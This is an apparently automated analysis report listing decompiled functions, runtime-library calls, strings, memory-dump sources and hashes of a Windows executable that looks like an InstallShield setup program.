                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                          APIs
                                                                                                                                                                          Strings
                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                          • Source File: 00000000.00000002.244531843.0000000000401000.00000080.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                          • Associated: 00000000.00000002.244437377.0000000000400000.00000002.00020000.sdmp Download File
                                                                                                                                                                          • Associated: 00000000.00000002.244913055.0000000000445000.00000040.00020000.sdmp Download File
                                                                                                                                                                          • Associated: 00000000.00000002.244989767.0000000000448000.00000080.00020000.sdmp Download File
                                                                                                                                                                          • Associated: 00000000.00000002.245349891.0000000000476000.00000002.00020000.sdmp Download File
                                                                                                                                                                          • Associated: 00000000.00000002.245427646.000000000049D000.00000004.00020000.sdmp Download File
                                                                                                                                                                          • Associated: 00000000.00000002.245438721.000000000049E000.00000008.00020000.sdmp Download File
                                                                                                                                                                          • Associated: 00000000.00000002.245446793.00000000004A8000.00000002.00020000.sdmp Download File
                                                                                                                                                                          • Associated: 00000000.00000002.245609186.00000000004D5000.00000002.00020000.sdmp Download File
                                                                                                                                                                          • Associated: 00000000.00000002.245666981.00000000004E5000.00000002.00020000.sdmp Download File
                                                                                                                                                                          Similarity
                                                                                                                                                                          • API ID: _memmove
                                                                                                                                                                          • String ID: invalid string position$string too long
                                                                                                                                                                          • API String ID: 4104443479-4289949731
                                                                                                                                                                          • Opcode ID: 03c86f5bc84e82cb88f2fe72767ce46c8d3466ba3fe33d34635049310be3e859
                                                                                                                                                                          • Instruction ID: 58a99352eaeb3b422e1ca34298109bc5b94e88c1d44d0f65b4d1d7b7fabe5789
                                                                                                                                                                          • Opcode Fuzzy Hash: 03c86f5bc84e82cb88f2fe72767ce46c8d3466ba3fe33d34635049310be3e859
                                                                                                                                                                          • Instruction Fuzzy Hash: 0231D0723043118BD7209E5CE880B5BF7AAEBD1B65F200A3FE6459B2D1C7B59840C7E9
                                                                                                                                                                          Uniqueness

                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                          Function 0042D4C2, Relevance: 5.4, APIs: 1, Strings: 2, Instructions: 135COMMON
                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                          APIs
                                                                                                                                                                          • __EH_prolog3_GS.LIBCMT ref: 0042D4CC
                                                                                                                                                                            • Part of subcall function 004025E0: GetLastError.KERNEL32(CC858012,?,00000000,74B04C30,?,?,00471258,000000FF,?,00401902,InstallShield.log,?,00000001), ref: 00402630
                                                                                                                                                                            • Part of subcall function 004025E0: SetLastError.KERNEL32(?,00483E18,00000000,?,00000000,74B04C30,?,?,00471258,000000FF,?,00401902,InstallShield.log,?,00000001), ref: 004026A8
                                                                                                                                                                            • Part of subcall function 0042DD62: __EH_prolog3.LIBCMT ref: 0042DD69
                                                                                                                                                                            • Part of subcall function 00436FE5: __EH_prolog3_catch_GS.LIBCMT ref: 00436FEF
                                                                                                                                                                            • Part of subcall function 00401580: GetLastError.KERNEL32(00000000,00483E18,00405EB5), ref: 0040158F
                                                                                                                                                                            • Part of subcall function 00401580: SysFreeString.OLEAUT32(?), ref: 004015AB
                                                                                                                                                                            • Part of subcall function 00401580: SysFreeString.OLEAUT32(?), ref: 004015B6
                                                                                                                                                                            • Part of subcall function 00401580: SetLastError.KERNEL32(?), ref: 004015D4
                                                                                                                                                                            • Part of subcall function 004110EF: __EH_prolog3_GS.LIBCMT ref: 004110F6
                                                                                                                                                                            • Part of subcall function 00435B8E: __EH_prolog3_GS.LIBCMT ref: 00435B95
                                                                                                                                                                          Strings
                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                          • Source File: 00000000.00000002.244531843.0000000000401000.00000080.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                          • Associated: 00000000.00000002.244437377.0000000000400000.00000002.00020000.sdmp Download File
                                                                                                                                                                          • Associated: 00000000.00000002.244913055.0000000000445000.00000040.00020000.sdmp Download File
                                                                                                                                                                          • Associated: 00000000.00000002.244989767.0000000000448000.00000080.00020000.sdmp Download File
                                                                                                                                                                          • Associated: 00000000.00000002.245349891.0000000000476000.00000002.00020000.sdmp Download File
                                                                                                                                                                          • Associated: 00000000.00000002.245427646.000000000049D000.00000004.00020000.sdmp Download File
                                                                                                                                                                          • Associated: 00000000.00000002.245438721.000000000049E000.00000008.00020000.sdmp Download File
                                                                                                                                                                          • Associated: 00000000.00000002.245446793.00000000004A8000.00000002.00020000.sdmp Download File
                                                                                                                                                                          • Associated: 00000000.00000002.245609186.00000000004D5000.00000002.00020000.sdmp Download File
                                                                                                                                                                          • Associated: 00000000.00000002.245666981.00000000004E5000.00000002.00020000.sdmp Download File
                                                                                                                                                                          Similarity
                                                                                                                                                                          • API ID: ErrorLast$H_prolog3_$FreeString$H_prolog3H_prolog3_catch_
                                                                                                                                                                          • String ID: ProductCode$UpgradeCode
                                                                                                                                                                          • API String ID: 3764184794-492229846
                                                                                                                                                                          • Opcode ID: 84a03d970e55444162efa28bfb0c1db6a0e85368541cfce3fbce6b49ee33de9f
                                                                                                                                                                          • Instruction ID: 8245366d6369e18f813c3e232dac6a3f8eea38d8a1190ac3be5d4a3143b13f4d
                                                                                                                                                                          • Opcode Fuzzy Hash: 84a03d970e55444162efa28bfb0c1db6a0e85368541cfce3fbce6b49ee33de9f
                                                                                                                                                                          • Instruction Fuzzy Hash: 90518F71A00258EEDF14DBA0CC91BDDB775BF14304F54409EE149AB1C2DB78AB48CB9A
                                                                                                                                                                          Uniqueness

                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                          Function 004370C7, Relevance: 5.4, APIs: 1, Strings: 2, Instructions: 135COMMON
                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                          APIs
                                                                                                                                                                          Strings
                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                          • Source File: 00000000.00000002.244531843.0000000000401000.00000080.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                          • Associated: 00000000.00000002.244437377.0000000000400000.00000002.00020000.sdmp Download File
                                                                                                                                                                          • Associated: 00000000.00000002.244913055.0000000000445000.00000040.00020000.sdmp Download File
                                                                                                                                                                          • Associated: 00000000.00000002.244989767.0000000000448000.00000080.00020000.sdmp Download File
                                                                                                                                                                          • Associated: 00000000.00000002.245349891.0000000000476000.00000002.00020000.sdmp Download File
                                                                                                                                                                          • Associated: 00000000.00000002.245427646.000000000049D000.00000004.00020000.sdmp Download File
                                                                                                                                                                          • Associated: 00000000.00000002.245438721.000000000049E000.00000008.00020000.sdmp Download File
                                                                                                                                                                          • Associated: 00000000.00000002.245446793.00000000004A8000.00000002.00020000.sdmp Download File
                                                                                                                                                                          • Associated: 00000000.00000002.245609186.00000000004D5000.00000002.00020000.sdmp Download File
                                                                                                                                                                          • Associated: 00000000.00000002.245666981.00000000004E5000.00000002.00020000.sdmp Download File
                                                                                                                                                                          Similarity
                                                                                                                                                                          • API ID: H_prolog3_
                                                                                                                                                                          • String ID: HsG$Language
                                                                                                                                                                          • API String ID: 2427045233-3247321199
                                                                                                                                                                          • Opcode ID: 830916ef971b7633ac558dd56b10e8013c48ba4c2ccdc50a86a335eccae9759b
                                                                                                                                                                          • Instruction ID: f494b91f90ea1dbd959871f7f143b356a84e859bb1d67a8eb273efb178d0e523
                                                                                                                                                                          • Opcode Fuzzy Hash: 830916ef971b7633ac558dd56b10e8013c48ba4c2ccdc50a86a335eccae9759b
                                                                                                                                                                          • Instruction Fuzzy Hash: 605162B1904208EFDF24DFA5C981ADEB7B5BF08304F20916EE445A7292DB34AE44CF58
                                                                                                                                                                          Uniqueness

                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                          Function 00447273, Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 127COMMON
                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                          APIs
                                                                                                                                                                          Strings
                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                          • Source File: 00000000.00000002.244913055.0000000000445000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                          • Associated: 00000000.00000002.244437377.0000000000400000.00000002.00020000.sdmp Download File
                                                                                                                                                                          • Associated: 00000000.00000002.244531843.0000000000401000.00000080.00020000.sdmp Download File
                                                                                                                                                                          • Associated: 00000000.00000002.244989767.0000000000448000.00000080.00020000.sdmp Download File
                                                                                                                                                                          • Associated: 00000000.00000002.245349891.0000000000476000.00000002.00020000.sdmp Download File
                                                                                                                                                                          • Associated: 00000000.00000002.245427646.000000000049D000.00000004.00020000.sdmp Download File
                                                                                                                                                                          • Associated: 00000000.00000002.245438721.000000000049E000.00000008.00020000.sdmp Download File
                                                                                                                                                                          • Associated: 00000000.00000002.245446793.00000000004A8000.00000002.00020000.sdmp Download File
                                                                                                                                                                          • Associated: 00000000.00000002.245609186.00000000004D5000.00000002.00020000.sdmp Download File
                                                                                                                                                                          • Associated: 00000000.00000002.245666981.00000000004E5000.00000002.00020000.sdmp Download File
                                                                                                                                                                          Similarity
                                                                                                                                                                          • API ID: __getbuf__lseeki64
                                                                                                                                                                          • String ID: HsG
                                                                                                                                                                          • API String ID: 275271894-1835203436
                                                                                                                                                                          • Opcode ID: d80b1a6b87591e685d21bdaeecfd12f1b2b970960cba59133d4d94c991d56d9a
                                                                                                                                                                          • Instruction ID: 32ae2e38c77818347a773ee92b1fbfbc21dd9289a376d72217f84730e44672e0
                                                                                                                                                                          • Opcode Fuzzy Hash: d80b1a6b87591e685d21bdaeecfd12f1b2b970960cba59133d4d94c991d56d9a
                                                                                                                                                                          • Instruction Fuzzy Hash: DA411671508B019EF3348F69C88167B77E4AF41334B148A1FECA6863D2D77C9842DB19
                                                                                                                                                                          Uniqueness

                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                          Function 00405F50, Relevance: 5.4, APIs: 1, Strings: 2, Instructions: 121COMMON
                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                          APIs
                                                                                                                                                                          Strings
                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                          • Source File: 00000000.00000002.244531843.0000000000401000.00000080.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                          • Associated: 00000000.00000002.244437377.0000000000400000.00000002.00020000.sdmp Download File
                                                                                                                                                                          • Associated: 00000000.00000002.244913055.0000000000445000.00000040.00020000.sdmp Download File
                                                                                                                                                                          • Associated: 00000000.00000002.244989767.0000000000448000.00000080.00020000.sdmp Download File
                                                                                                                                                                          • Associated: 00000000.00000002.245349891.0000000000476000.00000002.00020000.sdmp Download File
                                                                                                                                                                          • Associated: 00000000.00000002.245427646.000000000049D000.00000004.00020000.sdmp Download File
                                                                                                                                                                          • Associated: 00000000.00000002.245438721.000000000049E000.00000008.00020000.sdmp Download File
                                                                                                                                                                          • Associated: 00000000.00000002.245446793.00000000004A8000.00000002.00020000.sdmp Download File
                                                                                                                                                                          • Associated: 00000000.00000002.245609186.00000000004D5000.00000002.00020000.sdmp Download File
                                                                                                                                                                          • Associated: 00000000.00000002.245666981.00000000004E5000.00000002.00020000.sdmp Download File
                                                                                                                                                                          Similarity
                                                                                                                                                                          • API ID: _memmove
                                                                                                                                                                          • String ID: invalid string position$string too long
                                                                                                                                                                          • API String ID: 4104443479-4289949731
                                                                                                                                                                          • Opcode ID: c22d2277bfc6bba91d7ed89af78dcd5d9fcee578846d8aa8022e915e9aa0ea0e
                                                                                                                                                                          • Instruction ID: 76a5a4f3226bb77b06694b0b37af88d552583c375612669f6cc30be095a1e04b
                                                                                                                                                                          • Opcode Fuzzy Hash: c22d2277bfc6bba91d7ed89af78dcd5d9fcee578846d8aa8022e915e9aa0ea0e
                                                                                                                                                                          • Instruction Fuzzy Hash: A031D2323047149BC724DE1CE88081BF3AAFFD0B15311093FE542D7290DB79A85087A9
                                                                                                                                                                          Uniqueness

                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                          Function 0045C2D1, Relevance: 5.4, APIs: 1, Strings: 2, Instructions: 119COMMON
                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                          APIs
                                                                                                                                                                          • __EH_prolog3_GS.LIBCMT ref: 0045C2DB
                                                                                                                                                                            • Part of subcall function 0040C384: __EH_prolog3.LIBCMT ref: 0040C38B
                                                                                                                                                                            • Part of subcall function 0040C384: GetLastError.KERNEL32(00000004,00433A61,?,00000000,00000004,0040EF8C,?,00000001), ref: 0040C3AD
                                                                                                                                                                            • Part of subcall function 0040C384: SetLastError.KERNEL32(?,00000000), ref: 0040C3ED
                                                                                                                                                                          Strings
                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                          • Source File: 00000000.00000002.244989767.0000000000448000.00000080.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                          • Associated: 00000000.00000002.244437377.0000000000400000.00000002.00020000.sdmp Download File
                                                                                                                                                                          • Associated: 00000000.00000002.244531843.0000000000401000.00000080.00020000.sdmp Download File
                                                                                                                                                                          • Associated: 00000000.00000002.244913055.0000000000445000.00000040.00020000.sdmp Download File
                                                                                                                                                                          • Associated: 00000000.00000002.245349891.0000000000476000.00000002.00020000.sdmp Download File
                                                                                                                                                                          • Associated: 00000000.00000002.245427646.000000000049D000.00000004.00020000.sdmp Download File
                                                                                                                                                                          • Associated: 00000000.00000002.245438721.000000000049E000.00000008.00020000.sdmp Download File
                                                                                                                                                                          • Associated: 00000000.00000002.245446793.00000000004A8000.00000002.00020000.sdmp Download File
                                                                                                                                                                          • Associated: 00000000.00000002.245609186.00000000004D5000.00000002.00020000.sdmp Download File
                                                                                                                                                                          • Associated: 00000000.00000002.245666981.00000000004E5000.00000002.00020000.sdmp Download File
                                                                                                                                                                          Similarity
                                                                                                                                                                          • API ID: ErrorLast$H_prolog3H_prolog3_
                                                                                                                                                                          • String ID: HsG$HsG
                                                                                                                                                                          • API String ID: 852442433-815662401
                                                                                                                                                                          • Opcode ID: cfa380dcde9affdf3d9b5956ded03d1106393d0d79b409ef4cb7c3de533474e3
                                                                                                                                                                          • Instruction ID: 8c32c02ba2b969149dc12b168c845890fdc25b02e4ee76d53e79740ee10e4955
                                                                                                                                                                          • Opcode Fuzzy Hash: cfa380dcde9affdf3d9b5956ded03d1106393d0d79b409ef4cb7c3de533474e3
                                                                                                                                                                          • Instruction Fuzzy Hash: EF41D571900208EECB14EFA5CC95EEE7B78AF55304F50816EFC05B7182DB745A49CB95
                                                                                                                                                                          Uniqueness

                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                          Function 004383E5, Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 118COMMON
                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                          APIs
                                                                                                                                                                          Strings
                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                          • Source File: 00000000.00000002.244531843.0000000000401000.00000080.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                          • Associated: 00000000.00000002.244437377.0000000000400000.00000002.00020000.sdmp Download File
                                                                                                                                                                          • Associated: 00000000.00000002.244913055.0000000000445000.00000040.00020000.sdmp Download File
                                                                                                                                                                          • Associated: 00000000.00000002.244989767.0000000000448000.00000080.00020000.sdmp Download File
                                                                                                                                                                          • Associated: 00000000.00000002.245349891.0000000000476000.00000002.00020000.sdmp Download File
                                                                                                                                                                          • Associated: 00000000.00000002.245427646.000000000049D000.00000004.00020000.sdmp Download File
                                                                                                                                                                          • Associated: 00000000.00000002.245438721.000000000049E000.00000008.00020000.sdmp Download File
                                                                                                                                                                          • Associated: 00000000.00000002.245446793.00000000004A8000.00000002.00020000.sdmp Download File
                                                                                                                                                                          • Associated: 00000000.00000002.245609186.00000000004D5000.00000002.00020000.sdmp Download File
                                                                                                                                                                          • Associated: 00000000.00000002.245666981.00000000004E5000.00000002.00020000.sdmp Download File
                                                                                                                                                                          Similarity
                                                                                                                                                                          • API ID: H_prolog3__memset
                                                                                                                                                                          • String ID: Setup.bmp
                                                                                                                                                                          • API String ID: 3055368530-70249682
                                                                                                                                                                          • Opcode ID: e0dca986f198cb1ce27a48e8ca8578c77bc641281ce51a058de874ea4feb1cf4
                                                                                                                                                                          • Instruction ID: a41fa79c03a2f85a43ef4b6adede775033049b1f3a63376c8f67de41f02d16d7
                                                                                                                                                                          • Opcode Fuzzy Hash: e0dca986f198cb1ce27a48e8ca8578c77bc641281ce51a058de874ea4feb1cf4
                                                                                                                                                                          • Instruction Fuzzy Hash: 1C41DB71900319AADB20EB618C417FEB6F8BF08304F4492AEB559E71C1EF789E458F95
                                                                                                                                                                          Uniqueness

                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                          Function 004222D6, Relevance: 5.4, APIs: 1, Strings: 2, Instructions: 111COMMON
                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                          APIs
                                                                                                                                                                          • __EH_prolog3_GS.LIBCMT ref: 004222E0
                                                                                                                                                                            • Part of subcall function 0040C6E1: __EH_prolog3.LIBCMT ref: 0040C6E8
                                                                                                                                                                            • Part of subcall function 00425CEE: __EH_prolog3.LIBCMT ref: 00425CF5
                                                                                                                                                                            • Part of subcall function 004100B6: __EH_prolog3_GS.LIBCMT ref: 004100BD
                                                                                                                                                                            • Part of subcall function 00401580: GetLastError.KERNEL32(00000000,00483E18,00405EB5), ref: 0040158F
                                                                                                                                                                            • Part of subcall function 00401580: SysFreeString.OLEAUT32(?), ref: 004015AB
                                                                                                                                                                            • Part of subcall function 00401580: SysFreeString.OLEAUT32(?), ref: 004015B6
                                                                                                                                                                            • Part of subcall function 00401580: SetLastError.KERNEL32(?), ref: 004015D4
                                                                                                                                                                          Strings
                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                          • Source File: 00000000.00000002.244531843.0000000000401000.00000080.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                          • Associated: 00000000.00000002.244437377.0000000000400000.00000002.00020000.sdmp Download File
                                                                                                                                                                          • Associated: 00000000.00000002.244913055.0000000000445000.00000040.00020000.sdmp Download File
                                                                                                                                                                          • Associated: 00000000.00000002.244989767.0000000000448000.00000080.00020000.sdmp Download File
                                                                                                                                                                          • Associated: 00000000.00000002.245349891.0000000000476000.00000002.00020000.sdmp Download File
                                                                                                                                                                          • Associated: 00000000.00000002.245427646.000000000049D000.00000004.00020000.sdmp Download File
                                                                                                                                                                          • Associated: 00000000.00000002.245438721.000000000049E000.00000008.00020000.sdmp Download File
                                                                                                                                                                          • Associated: 00000000.00000002.245446793.00000000004A8000.00000002.00020000.sdmp Download File
                                                                                                                                                                          • Associated: 00000000.00000002.245609186.00000000004D5000.00000002.00020000.sdmp Download File
                                                                                                                                                                          • Associated: 00000000.00000002.245666981.00000000004E5000.00000002.00020000.sdmp Download File
                                                                                                                                                                          Similarity
                                                                                                                                                                          • API ID: ErrorFreeH_prolog3H_prolog3_LastString
                                                                                                                                                                          • String ID: Extracting resource: %s$msiaction.cpp
                                                                                                                                                                          • API String ID: 262529356-4212155731
                                                                                                                                                                          • Opcode ID: 4ad68646dfa4507b5755e510e49a37ed854aa4b08181c71866e27f52f5c0dd0b
                                                                                                                                                                          • Instruction ID: ef596da4fa047c752b7b38173379f9b1cfaad3b80dd5abd6214fc0e99b0043b9
                                                                                                                                                                          • Opcode Fuzzy Hash: 4ad68646dfa4507b5755e510e49a37ed854aa4b08181c71866e27f52f5c0dd0b
                                                                                                                                                                          • Instruction Fuzzy Hash: 7141C170901258EEDB14DBA5CD45BDDB7B4BF11308F4480AEE046B7192EB785F48CB69
                                                                                                                                                                          Uniqueness

                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                          Function 00438027, Relevance: 5.4, APIs: 1, Strings: 2, Instructions: 110COMMON
                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                          APIs
                                                                                                                                                                          • __EH_prolog3_GS.LIBCMT ref: 00438031
                                                                                                                                                                            • Part of subcall function 00402580: GetLastError.KERNEL32 ref: 0040259F
                                                                                                                                                                            • Part of subcall function 00402580: SetLastError.KERNEL32(?), ref: 004025CF
                                                                                                                                                                            • Part of subcall function 004025E0: GetLastError.KERNEL32(CC858012,?,00000000,74B04C30,?,?,00471258,000000FF,?,00401902,InstallShield.log,?,00000001), ref: 00402630
                                                                                                                                                                            • Part of subcall function 004025E0: SetLastError.KERNEL32(?,00483E18,00000000,?,00000000,74B04C30,?,?,00471258,000000FF,?,00401902,InstallShield.log,?,00000001), ref: 004026A8
                                                                                                                                                                            • Part of subcall function 00417579: __EH_prolog3_GS.LIBCMT ref: 00417583
                                                                                                                                                                          Strings
                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                          • Source File: 00000000.00000002.244531843.0000000000401000.00000080.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                          • Associated: 00000000.00000002.244437377.0000000000400000.00000002.00020000.sdmp Download File
                                                                                                                                                                          • Associated: 00000000.00000002.244913055.0000000000445000.00000040.00020000.sdmp Download File
                                                                                                                                                                          • Associated: 00000000.00000002.244989767.0000000000448000.00000080.00020000.sdmp Download File
                                                                                                                                                                          • Associated: 00000000.00000002.245349891.0000000000476000.00000002.00020000.sdmp Download File
                                                                                                                                                                          • Associated: 00000000.00000002.245427646.000000000049D000.00000004.00020000.sdmp Download File
                                                                                                                                                                          • Associated: 00000000.00000002.245438721.000000000049E000.00000008.00020000.sdmp Download File
                                                                                                                                                                          • Associated: 00000000.00000002.245446793.00000000004A8000.00000002.00020000.sdmp Download File
                                                                                                                                                                          • Associated: 00000000.00000002.245609186.00000000004D5000.00000002.00020000.sdmp Download File
                                                                                                                                                                          • Associated: 00000000.00000002.245666981.00000000004E5000.00000002.00020000.sdmp Download File
                                                                                                                                                                          Similarity
                                                                                                                                                                          • API ID: ErrorLast$H_prolog3_
                                                                                                                                                                          • String ID: %s: %s$HsG
                                                                                                                                                                          • API String ID: 3339191932-201342294
                                                                                                                                                                          • Opcode ID: 0e0a9114a3c43a1d033439a21dfd7af05c070e281ee98c14e6b20e46e388d2f9
                                                                                                                                                                          • Instruction ID: d0311f70ac9bb6f43a17f205f6e817dd52eaa5ab04bf628bf374a2706c9c04cd
                                                                                                                                                                          • Opcode Fuzzy Hash: 0e0a9114a3c43a1d033439a21dfd7af05c070e281ee98c14e6b20e46e388d2f9
                                                                                                                                                                          • Instruction Fuzzy Hash: 06417270E00208EBDB18DBA4CC55BDDB775BF54304F5480AEE505A71D1DB789A48CB95
                                                                                                                                                                          Uniqueness

                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                          Function 00434A91, Relevance: 5.4, APIs: 1, Strings: 2, Instructions: 105COMMON
                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                          APIs
                                                                                                                                                                          • __EH_prolog3_GS.LIBCMT ref: 00434A9B
                                                                                                                                                                            • Part of subcall function 00402580: GetLastError.KERNEL32 ref: 0040259F
                                                                                                                                                                            • Part of subcall function 00402580: SetLastError.KERNEL32(?), ref: 004025CF
                                                                                                                                                                            • Part of subcall function 00425CEE: __EH_prolog3.LIBCMT ref: 00425CF5
                                                                                                                                                                            • Part of subcall function 00417579: __EH_prolog3_GS.LIBCMT ref: 00417583
                                                                                                                                                                          Strings
                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                          • Source File: 00000000.00000002.244531843.0000000000401000.00000080.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                          • Associated: 00000000.00000002.244437377.0000000000400000.00000002.00020000.sdmp Download File
                                                                                                                                                                          • Associated: 00000000.00000002.244913055.0000000000445000.00000040.00020000.sdmp Download File
                                                                                                                                                                          • Associated: 00000000.00000002.244989767.0000000000448000.00000080.00020000.sdmp Download File
                                                                                                                                                                          • Associated: 00000000.00000002.245349891.0000000000476000.00000002.00020000.sdmp Download File
                                                                                                                                                                          • Associated: 00000000.00000002.245427646.000000000049D000.00000004.00020000.sdmp Download File
                                                                                                                                                                          • Associated: 00000000.00000002.245438721.000000000049E000.00000008.00020000.sdmp Download File
                                                                                                                                                                          • Associated: 00000000.00000002.245446793.00000000004A8000.00000002.00020000.sdmp Download File
                                                                                                                                                                          • Associated: 00000000.00000002.245609186.00000000004D5000.00000002.00020000.sdmp Download File
                                                                                                                                                                          • Associated: 00000000.00000002.245666981.00000000004E5000.00000002.00020000.sdmp Download File
                                                                                                                                                                          Similarity
                                                                                                                                                                          • API ID: ErrorH_prolog3_Last$H_prolog3
                                                                                                                                                                          • String ID: %s: %s$HsG
                                                                                                                                                                          • API String ID: 3076002782-201342294
                                                                                                                                                                          • Opcode ID: 8cdd069ab4ad131dfbba0b251a38ee14e50faae7ae6c3bc26f59b634a35ca992
                                                                                                                                                                          • Instruction ID: d4ddc86ef7ab2bc5d277844860c44f0f30449a4b613ad45fdffc4895035c9f11
                                                                                                                                                                          • Opcode Fuzzy Hash: 8cdd069ab4ad131dfbba0b251a38ee14e50faae7ae6c3bc26f59b634a35ca992
                                                                                                                                                                          • Instruction Fuzzy Hash: B841AE30900258EEDB10EBA4CD85BDDB7B4AF55304F4440AEE446B7192EB78AB48CBA5
                                                                                                                                                                          Uniqueness

                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                          Function 0045B867, Relevance: 5.4, APIs: 1, Strings: 2, Instructions: 105COMMON
                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                          APIs
                                                                                                                                                                          • __EH_prolog3_GS.LIBCMT ref: 0045B86E
                                                                                                                                                                            • Part of subcall function 00402580: GetLastError.KERNEL32 ref: 0040259F
                                                                                                                                                                            • Part of subcall function 00402580: SetLastError.KERNEL32(?), ref: 004025CF
                                                                                                                                                                            • Part of subcall function 0040C384: __EH_prolog3.LIBCMT ref: 0040C38B
                                                                                                                                                                            • Part of subcall function 0040C384: GetLastError.KERNEL32(00000004,00433A61,?,00000000,00000004,0040EF8C,?,00000001), ref: 0040C3AD
                                                                                                                                                                            • Part of subcall function 0040C384: SetLastError.KERNEL32(?,00000000), ref: 0040C3ED
                                                                                                                                                                            • Part of subcall function 004560AC: __EH_prolog3_GS.LIBCMT ref: 004560B6
                                                                                                                                                                          Strings
                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                          • Source File: 00000000.00000002.244989767.0000000000448000.00000080.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                          • Associated: 00000000.00000002.244437377.0000000000400000.00000002.00020000.sdmp Download File
                                                                                                                                                                          • Associated: 00000000.00000002.244531843.0000000000401000.00000080.00020000.sdmp Download File
                                                                                                                                                                          • Associated: 00000000.00000002.244913055.0000000000445000.00000040.00020000.sdmp Download File
                                                                                                                                                                          • Associated: 00000000.00000002.245349891.0000000000476000.00000002.00020000.sdmp Download File
                                                                                                                                                                          • Associated: 00000000.00000002.245427646.000000000049D000.00000004.00020000.sdmp Download File
                                                                                                                                                                          • Associated: 00000000.00000002.245438721.000000000049E000.00000008.00020000.sdmp Download File
                                                                                                                                                                          • Associated: 00000000.00000002.245446793.00000000004A8000.00000002.00020000.sdmp Download File
                                                                                                                                                                          • Associated: 00000000.00000002.245609186.00000000004D5000.00000002.00020000.sdmp Download File
                                                                                                                                                                          • Associated: 00000000.00000002.245666981.00000000004E5000.00000002.00020000.sdmp Download File
                                                                                                                                                                          Similarity
                                                                                                                                                                          • API ID: ErrorLast$H_prolog3_$H_prolog3
                                                                                                                                                                          • String ID: HsG$HsG
                                                                                                                                                                          • API String ID: 532146472-815662401
                                                                                                                                                                          • Opcode ID: 48d497c599b6e893984326e3490b0a51a17c2fca2b10d4296257255aba5c47e9
                                                                                                                                                                          • Instruction ID: c45ac3600fb8b5a3d54d1e7bdc60134dc35422ed66e4fadba2b55305d73f1fc5
                                                                                                                                                                          • Opcode Fuzzy Hash: 48d497c599b6e893984326e3490b0a51a17c2fca2b10d4296257255aba5c47e9
                                                                                                                                                                          • Instruction Fuzzy Hash: D3316071900108EADB10EBA5CC41ADEBB78AF55344F50412EF90577292DB795D0ACBA8
                                                                                                                                                                          Uniqueness

                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                          Function 00416F96, Relevance: 5.4, APIs: 1, Strings: 2, Instructions: 103COMMON
                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                          APIs
                                                                                                                                                                          • __EH_prolog3_catch_GS.LIBCMT ref: 00416F9D
                                                                                                                                                                            • Part of subcall function 0040C6E1: __EH_prolog3.LIBCMT ref: 0040C6E8
                                                                                                                                                                          Strings
                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                          • Source File: 00000000.00000002.244531843.0000000000401000.00000080.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                          • Associated: 00000000.00000002.244437377.0000000000400000.00000002.00020000.sdmp Download File
                                                                                                                                                                          • Associated: 00000000.00000002.244913055.0000000000445000.00000040.00020000.sdmp Download File
                                                                                                                                                                          • Associated: 00000000.00000002.244989767.0000000000448000.00000080.00020000.sdmp Download File
                                                                                                                                                                          • Associated: 00000000.00000002.245349891.0000000000476000.00000002.00020000.sdmp Download File
                                                                                                                                                                          • Associated: 00000000.00000002.245427646.000000000049D000.00000004.00020000.sdmp Download File
                                                                                                                                                                          • Associated: 00000000.00000002.245438721.000000000049E000.00000008.00020000.sdmp Download File
                                                                                                                                                                          • Associated: 00000000.00000002.245446793.00000000004A8000.00000002.00020000.sdmp Download File
                                                                                                                                                                          • Associated: 00000000.00000002.245609186.00000000004D5000.00000002.00020000.sdmp Download File
                                                                                                                                                                          • Associated: 00000000.00000002.245666981.00000000004E5000.00000002.00020000.sdmp Download File
                                                                                                                                                                          Similarity
                                                                                                                                                                          • API ID: H_prolog3H_prolog3_catch_
                                                                                                                                                                          • String ID: HsG$HsG
                                                                                                                                                                          • API String ID: 863784098-815662401
